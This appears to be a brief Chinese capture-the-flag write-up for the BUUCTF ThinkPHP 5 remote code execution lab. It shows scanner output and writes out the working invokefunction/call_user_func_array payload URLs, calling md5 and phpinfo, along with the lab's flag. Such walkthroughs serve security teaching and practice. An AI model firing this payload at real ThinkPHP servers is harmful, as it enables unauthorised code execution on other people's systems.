BUUCTF-Real-[ThinkPHP]5-Rce

1、ThinkPHP检测工具

https://github.com/anx0ing/thinkphp_scan

漏洞检测

通过漏洞检测,我们发现存在rce漏洞!

2、漏洞利用

----
[!] Name: Thinkphp5 5.0.22/5.1.29 Remote Code Execution Vulnerability
    Script: thinkphp5022_5129.py
    Url: http://node5.buuoj.cn:27683/
      Vulnerable: True
      Attack: True
      Method: GET
      Payload: http://node5.buuoj.cn:27683/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=1
----

payload
http://node5.buuoj.cn:27683/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1 and it'll execute the phpinfo:

修改payload,我们就可以拿到phpinfo页面,flag就在其中!


至于扫描器,githb有很多!自己下载!

3、get flag


flag{9f4a1a0b-ef58-49ac-8344-63aa3914af75} 
相关推荐
芯盾时代4 小时前
数字身份发展趋势前瞻:身份韧性与安全
运维·安全·网络安全·密码学·信息与通信
知孤云出岫7 小时前
web 渗透学习指南——初学者防入狱篇
前端·网络安全·渗透·web
mushangqiujin7 小时前
ctfshow web文件上传 web166-170
网络安全
Suckerbin10 小时前
Hms?: 1渗透测试
学习·安全·网络安全
newxtc11 小时前
【国内中间件厂商排名及四大中间件对比分析】
安全·web安全·网络安全·中间件·行为验证·国产中间件
follycat16 小时前
[极客大挑战 2019]HTTP 1
网络·网络协议·http·网络安全
Lionhacker1 天前
网络工程师这个行业可以一直干到退休吗?
网络·数据库·网络安全·黑客·黑客技术
centos081 天前
PWN(栈溢出漏洞)-原创小白超详细[Jarvis-level0]
网络安全·二进制·pwn·ctf
程序员小予1 天前
如何成为一名黑客?小白必学的12个基本步骤
计算机网络·安全·网络安全